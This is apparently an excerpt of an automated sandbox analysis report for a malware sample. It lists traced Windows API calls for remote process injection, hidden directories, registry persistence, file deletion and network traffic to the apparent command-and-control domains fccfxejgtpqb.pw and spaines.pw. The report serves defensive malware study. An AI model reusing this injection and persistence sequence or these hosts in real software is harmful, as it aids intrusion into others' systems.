Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetModuleHandleA.KERNEL32(00000000,00000000,?,02263F27,0000000A,E8FFFF1B,00000000,0000000A), ref: 02263F51
• Sleep.KERNEL32(000003E8,00000000,?,02263F27,0000000A,E8FFFF1B,00000000,0000000A), ref: 02263F6F
• Sleep.KERNEL32(000007D0), ref: 02263F7F
• Sleep.KERNEL32(00000BB8), ref: 02263F8F
Memory Dump Source
• Source File: 00000000.00000002.1654114084.0000000002260000.00000040.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2260000_java.jbxd
Similarity
• API ID: Sleep$HandleModule
• String ID:
• API String ID: 3646095425-0
• Opcode ID: e04edd3b56a3ae2e38138ccc1fa4ca0e34bf568aa8a0740690bb103294f382c8
                                                                                                                                                                                          • Instruction ID: 73ac43c5184fe57861ee2d2da8c26286d91fbebb8d9dd8aa07b7b7b5aede44be
                                                                                                                                                                                          • Opcode Fuzzy Hash: e04edd3b56a3ae2e38138ccc1fa4ca0e34bf568aa8a0740690bb103294f382c8
                                                                                                                                                                                          • Instruction Fuzzy Hash: CAF01C729683509EFB41BFF08C4C66A3AB9AF00B04F0400D0AA89AD0DECF7480D08E75
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                          Execution Coverage:17.9%
                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:99.8%
                                                                                                                                                                                          Signature Coverage:4%
                                                                                                                                                                                          Total number of Nodes:623
                                                                                                                                                                                          Total number of Limit Nodes:10
execution_graph: node and edge listing of the execution graph (rendered as an interactive graph in the original report), omitted here.

Control-flow Graph

• Executed
• Not Executed
control_flow_graph: basic-block and edge listing for the function at 2f02f88 (rendered as a graph in the original report), omitted here.
APIs
• send.WS2_32(?,00000000,00000000,00000000), ref: 02F02FF4
• send.WS2_32(?,02F02A30,02F02A2C,00000000), ref: 02F0300D
• recv.WS2_32(?,02F02A30,00A00000,00000000), ref: 02F03030
• closesocket.WS2_32(?), ref: 02F0304A
Strings
Memory Dump Source
• Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
Similarity
• API ID: send$closesocketrecv
• String ID: fccfxejgtpqb.pw
• API String ID: 3431254638-3332661483
• Opcode ID: 9574067959f33b04d739d713f0caaf9cbaae1037dcd8482bb700ab3644756bfa
• Instruction ID: 6841f71e62f07134866fad790052884c6829c601e12220bfc7758b285fdd1488
• Opcode Fuzzy Hash: 9574067959f33b04d739d713f0caaf9cbaae1037dcd8482bb700ab3644756bfa
• Instruction Fuzzy Hash: BE216F72B00114ABEB215E28CC84F5A7AE9EF44788F0545D4FF09EB294D735ED109FA4
Uniqueness

Uniqueness Score: -1.00%

APIs
• VirtualAllocEx.KERNELBASE(?,00000000,00004F37,00003000,00000040,E8FFF41B,?,E900001B,02F00D88,00000000,0000090B,00000000), ref: 02F00E06
• WriteProcessMemory.KERNELBASE(?,-000008D9,00000000,00004F37,00000000), ref: 02F00E24
• CreateRemoteThread.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000), ref: 02F00E70
Memory Dump Source
• Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
Similarity
• API ID: AllocCreateMemoryProcessRemoteThreadVirtualWrite
• String ID:
                                                                                                                                                                                          • API String ID: 1718980022-0
                                                                                                                                                                                          • Opcode ID: 20e57d88da2030ec20683870e6424b515fd74008d7ab68b95a7bc2f489d980e4
                                                                                                                                                                                          • Instruction ID: ddab67570ff2000dfcb3a3ba602a6dd25ab21d20abd24e295af70045eb2888e8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 20e57d88da2030ec20683870e6424b515fd74008d7ab68b95a7bc2f489d980e4
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D115132600205BFFF215F25CC85F963BA9EF81794F188055FE08BE199D770A521DBA8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNELBASE(02F02925,00000008,?,00000000,02F02811,00000000), ref: 02F02932
                                                                                                                                                                                            • Part of subcall function 02F00C9C: GetProcAddress.KERNEL32(02F02811,02F0290A), ref: 02F00CA9
                                                                                                                                                                                          • WSAStartup.WS2_32(00000202,00000000), ref: 02F02957
                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,01400000,00003000,00000004), ref: 02F0296F
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,02F0299D), ref: 02F029AC
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,02F029D4), ref: 02F029E3
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,02F02A0B), ref: 02F02A1A
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02F02A94
                                                                                                                                                                                            • Part of subcall function 02F02683: CreateFileA.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000), ref: 02F0269E
                                                                                                                                                                                            • Part of subcall function 02F02683: GetFileSize.KERNEL32(?,00000000), ref: 02F026B7
                                                                                                                                                                                            • Part of subcall function 02F02683: ReadFile.KERNELBASE(02F0298A,?,00000000,?,00000000), ref: 02F026DB
                                                                                                                                                                                            • Part of subcall function 02F02683: CloseHandle.KERNEL32(02F0298A), ref: 02F026EC
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02F02AD8
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02F02B2E
                                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02F02B42
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$Deletelstrcat$AddressAllocCloseCreateHandleLibraryLoadProcReadSizeSleepStartupVirtual
                                                                                                                                                                                          • String ID: `nIu
                                                                                                                                                                                          • API String ID: 3655464437-1509933002
                                                                                                                                                                                          • Opcode ID: 123cee287050aa4130abb0b2e68c87aa3392ee7ebd80efcf2861b6cc2cd8a842
                                                                                                                                                                                          • Instruction ID: ee125d008c763b65e922deb913ec8aa6847950c085649244760556575f980a7e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 123cee287050aa4130abb0b2e68c87aa3392ee7ebd80efcf2861b6cc2cd8a842
                                                                                                                                                                                          • Instruction Fuzzy Hash: B05154719002149EEF226B718DCCFAB76BDFF40785F0444A6AF45EA095DE349680EEB1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000), ref: 02F0065A
                                                                                                                                                                                            • Part of subcall function 02F0067C: LoadLibraryA.KERNELBASE(02F00673,00000009,?,00000000), ref: 02F00681
                                                                                                                                                                                            • Part of subcall function 02F0067C: lstrcmpiA.KERNEL32(?,00000000), ref: 02F006EB
                                                                                                                                                                                            • Part of subcall function 02F0067C: Sleep.KERNELBASE(00001388), ref: 02F006FE
                                                                                                                                                                                            • Part of subcall function 02F0067C: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 02F0071F
                                                                                                                                                                                            • Part of subcall function 02F0067C: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 02F00731
                                                                                                                                                                                            • Part of subcall function 02F0067C: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 02F00752
                                                                                                                                                                                            • Part of subcall function 02F0067C: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 02F00764
                                                                                                                                                                                            • Part of subcall function 02F0067C: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 02F00785
                                                                                                                                                                                            • Part of subcall function 02F0067C: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 02F00797
                                                                                                                                                                                            • Part of subcall function 02F0067C: VirtualAlloc.KERNELBASE(00000000,00100000,00003000,00000004), ref: 02F007AB
                                                                                                                                                                                            • Part of subcall function 02F026F9: CreateFileA.KERNELBASE(?,40000000,00000003,00000000,?,00000080,00000000,?,00000000), ref: 02F02715
                                                                                                                                                                                            • Part of subcall function 02F026F9: SetFilePointer.KERNELBASE(?,00000000,00000000,00000002), ref: 02F02732
                                                                                                                                                                                            • Part of subcall function 02F026F9: WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000), ref: 02F0274E
                                                                                                                                                                                            • Part of subcall function 02F026F9: CloseHandle.KERNEL32(?), ref: 02F0275F
                                                                                                                                                                                            • Part of subcall function 02F00811: RegCreateKeyExA.KERNELBASE(00000000,02F00840,0000002E,?,?,?,?,?,00000002,?,00000000,00000000), ref: 02F00876
                                                                                                                                                                                            • Part of subcall function 02F00811: RegSetValueExA.KERNELBASE(?,00000000,00000000,00000001,80000001,00000000), ref: 02F0089D
                                                                                                                                                                                            • Part of subcall function 02F00811: RegCloseKey.KERNELBASE(?), ref: 02F008A9
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateFile$AttributesDirectory$Close$AllocHandleLibraryLoadMutexPointerSleepValueVirtualWritelstrcmpi
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2311107590-0
                                                                                                                                                                                          • Opcode ID: 23fe9d41b4c0fd8f85a64b07ac5772dc61afcf4539fa5e17d3a9c2967f868177
                                                                                                                                                                                          • Instruction ID: f248af9eafa8d88603038d7ab82f73c7d47eeed70a478c35015bfddb8683cc41
                                                                                                                                                                                          • Opcode Fuzzy Hash: 23fe9d41b4c0fd8f85a64b07ac5772dc61afcf4539fa5e17d3a9c2967f868177
                                                                                                                                                                                          • Instruction Fuzzy Hash: 485130B2504214AFDB12AB60CC88FAA77BCEF44744F05059EAB85EF085DE709690CEA5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNELBASE(02F00673,00000009,?,00000000), ref: 02F00681
                                                                                                                                                                                            • Part of subcall function 02F00C9C: GetProcAddress.KERNEL32(02F02811,02F0290A), ref: 02F00CA9
                                                                                                                                                                                            • Part of subcall function 02F02597: lstrcat.KERNEL32(02F02634,00000000), ref: 02F025DE
                                                                                                                                                                                            • Part of subcall function 02F006C2: lstrcmpiA.KERNEL32(?,00000000), ref: 02F006EB
                                                                                                                                                                                            • Part of subcall function 02F006C2: Sleep.KERNELBASE(00001388), ref: 02F006FE
                                                                                                                                                                                            • Part of subcall function 02F006C2: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 02F0071F
                                                                                                                                                                                            • Part of subcall function 02F006C2: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 02F00731
                                                                                                                                                                                            • Part of subcall function 02F006C2: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 02F00752
                                                                                                                                                                                            • Part of subcall function 02F006C2: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 02F00764
                                                                                                                                                                                            • Part of subcall function 02F006C2: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 02F00785
                                                                                                                                                                                            • Part of subcall function 02F006C2: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 02F00797
                                                                                                                                                                                            • Part of subcall function 02F006C2: VirtualAlloc.KERNELBASE(00000000,00100000,00003000,00000004), ref: 02F007AB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AttributesCreateDirectoryFile$AddressAllocLibraryLoadProcSleepVirtuallstrcatlstrcmpi
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2102637170-0
                                                                                                                                                                                          • Opcode ID: 5de239d9be66570cd2289521d95d90d9cab5e80f55aeab0bdb7006df202fe909
                                                                                                                                                                                          • Instruction ID: 8b6ced52c6257eac7bc10743625d25943bd0e1b55181326e7cf6d88f68503eeb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5de239d9be66570cd2289521d95d90d9cab5e80f55aeab0bdb7006df202fe909
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F411FB2500214AFDF12AB60CCC8FAA77BCEF44744F05049DAB85EF085DE349680CEA5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrcmpiA.KERNEL32(?,00000000), ref: 02F006EB
                                                                                                                                                                                          • Sleep.KERNELBASE(00001388), ref: 02F006FE
                                                                                                                                                                                          • CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 02F0071F
                                                                                                                                                                                          • SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 02F00731
                                                                                                                                                                                          • CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 02F00752
                                                                                                                                                                                          • SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 02F00764
  • Part of subcall function 02F02597: lstrcat.KERNEL32(02F02634,00000000), ref: 02F025DE
• CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 02F00785
• SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 02F00797
• VirtualAlloc.KERNELBASE(00000000,00100000,00003000,00000004), ref: 02F007AB
Memory Dump Source
• Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
Similarity
• API ID: AttributesCreateDirectoryFile$AllocSleepVirtuallstrcatlstrcmpi
• String ID:
• API String ID: 2015199959-0
• Opcode ID: 1c226179281e77d9add93f1d77d7a7ba9467f2847751cd0325fb52aca6bbedbc
• Instruction ID: 7009c40524069369fb1c3b099d2bd595164cbaf3ff01043dba5f735b09a24b68
• Opcode Fuzzy Hash: 1c226179281e77d9add93f1d77d7a7ba9467f2847751cd0325fb52aca6bbedbc
• Instruction Fuzzy Hash: 2E31FFB25002149FDF16AB60CCC8FAA73ACEF44744F4504ADAB85EF085DE749680CEA9
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

APIs
• lstrcat.KERNEL32(00000000,02F0299D), ref: 02F029AC
  • Part of subcall function 02F029DD: lstrcat.KERNEL32(00000000,02F029D4), ref: 02F029E3
  • Part of subcall function 02F029DD: lstrcat.KERNEL32(00000000,02F02A0B), ref: 02F02A1A
  • Part of subcall function 02F029DD: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02F02A94
  • Part of subcall function 02F029DD: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02F02AD8
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02F02B2E
• Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02F02B42
Memory Dump Source
• Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
Similarity
• API ID: DeleteFilelstrcat$Sleep
• String ID:
• API String ID: 588723932-0
• Opcode ID: a59d9b3575d39faaedf29f35c9c8ec066547d1ec0f6634f348c18150469a5b98
• Instruction ID: 3ca701afb72ffdd9a6ed082a981da5c9392b0c5c14ef5d74d2706bc73805186a
• Opcode Fuzzy Hash: a59d9b3575d39faaedf29f35c9c8ec066547d1ec0f6634f348c18150469a5b98
• Instruction Fuzzy Hash: E04123719002189EDF226B71CDCCFAB76BDEF40745F0445A6AF45EA091DE349680EEB1
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

APIs
• lstrlen.KERNEL32(fccfxejgtpqb.pw,00000000,02F02F2E,00000011,?,00000000,00000011,00000000,/EiDQjNbWEQ/,00000000), ref: 02F02F53
  • Part of subcall function 02F02F88: send.WS2_32(?,00000000,00000000,00000000), ref: 02F02FF4
  • Part of subcall function 02F02F88: send.WS2_32(?,02F02A30,02F02A2C,00000000), ref: 02F0300D
  • Part of subcall function 02F02F88: recv.WS2_32(?,02F02A30,00A00000,00000000), ref: 02F03030
  • Part of subcall function 02F02F88: closesocket.WS2_32(?), ref: 02F0304A
Memory Dump Source
• Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
Similarity
• API ID: send$closesocketlstrlenrecv
• String ID: fccfxejgtpqb.pw
• API String ID: 1577144637-3332661483
• Opcode ID: 47e1b1d1e09dae78ecab814af72e97c8beb8c55764ffd7795c611f6a9b2faa7b
• Instruction ID: e59e55f8cd238cbcf5d7055b08cb8d032030521242451e78f8c501328a345ec2
• Opcode Fuzzy Hash: 47e1b1d1e09dae78ecab814af72e97c8beb8c55764ffd7795c611f6a9b2faa7b
• Instruction Fuzzy Hash: 12219372B00154ABEB125E24CC84F9A7BA9EF447C9F0840D4FF08AB195D735AA10AFA4
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02F00D07
• Sleep.KERNELBASE(000003E8), ref: 02F00D1D
• Process32First.KERNEL32(?,00000000), ref: 02F00D3D
• FindCloseChangeNotification.KERNELBASE(00000000,0000090B,00000000), ref: 02F00D88
• Process32Next.KERNEL32(?,?), ref: 02F00D9E
• FindCloseChangeNotification.KERNELBASE(?), ref: 02F00DCA
• Sleep.KERNELBASE(000003E8), ref: 02F00DD5
Memory Dump Source
• Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
Similarity
• API ID: ChangeCloseFindNotificationProcess32Sleep$CreateFirstNextSnapshotToolhelp32
• String ID:
• API String ID: 1902139912-0
• Opcode ID: 7ef9ee58ba518d41f3acc58a6d1fc59d2da839a49c47249353964cec8b1c453b
• Instruction ID: 2cfc4efe58b5642f90d4287799fe6004f3beeaaa4275b213007965a9fec0cc9e
• Opcode Fuzzy Hash: 7ef9ee58ba518d41f3acc58a6d1fc59d2da839a49c47249353964cec8b1c453b
• Instruction Fuzzy Hash: 71217131902118ABEF225F14CC94BE9B7B9AF08741F0801D9EA1AEA1D5CF715A90CF65
Uniqueness
Uniqueness Score: -1.00%
                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 240 2f0261c-2f0262a call 2f03653 ExpandEnvironmentStringsA 243 2f02636-2f02640 240->243 244 2f0262c 240->244 245 2f02642-2f0265b call 2f0265e 243->245 246 2f0266c-2f02679 lstrcat 243->246 247 2f02634 244->247 248 2f0262f call 2f02597 244->248 252 2f026b9-2f026c6 245->252 253 2f0265d-2f02666 lstrcat 245->253 250 2f0267f-2f02680 246->250 247->250 248->247 254 2f026c8-2f026e3 ReadFile 252->254 255 2f026e9-2f026f6 CloseHandle 252->255 253->246 254->255 256 2f026e5-2f026e6 254->256 256->255
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ExpandEnvironmentStringsA.KERNEL32(02F0260C,00000010,?,?,02F0298A,00000104), ref: 02F02621
                                                                                                                                                                                          • lstrcat.KERNEL32(02F0298A,02F02659), ref: 02F02666
                                                                                                                                                                                          • lstrcat.KERNEL32(02F0298A,02F0298A), ref: 02F02679
                                                                                                                                                                                            • Part of subcall function 02F02597: lstrcat.KERNEL32(02F02634,00000000), ref: 02F025DE
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcat$EnvironmentExpandStrings
                                                                                                                                                                                          • String ID: \AC\
                                                                                                                                                                                          • API String ID: 2903145849-1749977576
                                                                                                                                                                                          • Opcode ID: 1a1455d68d8f3bd8c3de392b281e5d27977fe7010f103cb395b91df9d1250492
                                                                                                                                                                                          • Instruction ID: beac57dd5c8ee1c15dbbce058d23a0f2d23c2e185a565310de32dc9b34e7f8ed
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a1455d68d8f3bd8c3de392b281e5d27977fe7010f103cb395b91df9d1250492
                                                                                                                                                                                          • Instruction Fuzzy Hash: 70115BB1500508EFEF029FA0CC89EADBBB9FF10384F0440A5EE45EA061D7308A51EFA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

Control-flow Graph

APIs
• lstrcat.KERNEL32(00000000,02F029D4), ref: 02F029E3
  • Part of subcall function 02F02A14: lstrcat.KERNEL32(00000000,02F02A0B), ref: 02F02A1A
  • Part of subcall function 02F02A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02F02A94
  • Part of subcall function 02F02A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02F02AD8
  • Part of subcall function 02F02A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02F02B2E
  • Part of subcall function 02F02A14: Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02F02B42
Memory Dump Source
• Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
Similarity
• API ID: DeleteFile$lstrcat$Sleep
• String ID:
• API String ID: 4261675396-0
• Opcode ID: f25f655f168d47ae09fd180d96ac9ab6615c369bbaafbdd74acb6aa40e99586a
• Instruction ID: bad94de65216555a867dd756a1f8a72e1f337ff6808bb394cea6aa67cccbf29c
• Opcode Fuzzy Hash: f25f655f168d47ae09fd180d96ac9ab6615c369bbaafbdd74acb6aa40e99586a
• Instruction Fuzzy Hash: D74123719002599EDF226B71CDCCFAB76BDEF40789F0444A6AF45EA085DE349680DEB0
Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • send.WS2_32(?,00000000,00000000,00000000), ref: 02F02FF4
                                                                                                                                                                                          • send.WS2_32(?,02F02A30,02F02A2C,00000000), ref: 02F0300D
                                                                                                                                                                                          • recv.WS2_32(?,02F02A30,00A00000,00000000), ref: 02F03030
                                                                                                                                                                                          • closesocket.WS2_32(?), ref: 02F0304A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: send$closesocketrecv
                                                                                                                                                                                          • String ID: fccfxejgtpqb.pw
                                                                                                                                                                                          • API String ID: 3431254638-3332661483
                                                                                                                                                                                          • Opcode ID: 3de71ac913557117b39ba19aefa8f7a10d2ba1ba6dbe92ee6fcdf69db35a4dda
                                                                                                                                                                                          • Instruction ID: 0c08ca304cab006b641f2c11d7db511eb2500ba1c5bd26652892f92f8235040b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3de71ac913557117b39ba19aefa8f7a10d2ba1ba6dbe92ee6fcdf69db35a4dda
                                                                                                                                                                                          • Instruction Fuzzy Hash: FD115172B00014ABEF125E28CC85F9A7BF9EF44788F0541D4FF08AA195D335E9109FA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,02F02A0B), ref: 02F02A1A
                                                                                                                                                                                            • Part of subcall function 02F02B4D: inet_addr.WS2_32(00000000), ref: 02F02BDA
                                                                                                                                                                                            • Part of subcall function 02F02B4D: gethostbyname.WS2_32(00000000), ref: 02F02BEE
                                                                                                                                                                                            • Part of subcall function 02F02B4D: Sleep.KERNELBASE(00000001,?,452F5000,00000020), ref: 02F02C44
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02F02A94
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02F02AD8
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02F02B2E
                                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02F02B42
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DeleteFile$Sleep$gethostbynameinet_addrlstrcat
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1642945479-0
                                                                                                                                                                                          • Opcode ID: e8b37fd542badaf8432c301c0c7f6f955668a479b2aefd2c0e39df4bfbe44a3d
                                                                                                                                                                                          • Instruction ID: e25cbe60b1bffee5149a55e253bf61ae087e64bb4c684b6d3fcc895a71bfb008
                                                                                                                                                                                          • Opcode Fuzzy Hash: e8b37fd542badaf8432c301c0c7f6f955668a479b2aefd2c0e39df4bfbe44a3d
                                                                                                                                                                                          • Instruction Fuzzy Hash: CE3112719002599EDF226B718DCCBAB76FCEF40789F0405E6AF45EA085DE349680DEB0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • inet_addr.WS2_32(00000000), ref: 02F02BDA
                                                                                                                                                                                          • gethostbyname.WS2_32(00000000), ref: 02F02BEE
                                                                                                                                                                                          • Sleep.KERNELBASE(00000001,?,452F5000,00000020), ref: 02F02C44
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Sleepgethostbynameinet_addr
                                                                                                                                                                                          • String ID: spaines.pw
                                                                                                                                                                                          • API String ID: 4125869991-3306378189
                                                                                                                                                                                          • Opcode ID: c9cc6fa465a78be1f47e10917d204f6e8e853b0dcedaa1fd5f228baccd3b115a
                                                                                                                                                                                          • Instruction ID: 013f7c341f51ce9822f8864702cb40663b56a831b8d6658f02fefdd60a8aad3e
                                                                                                                                                                                          • Opcode Fuzzy Hash: c9cc6fa465a78be1f47e10917d204f6e8e853b0dcedaa1fd5f228baccd3b115a
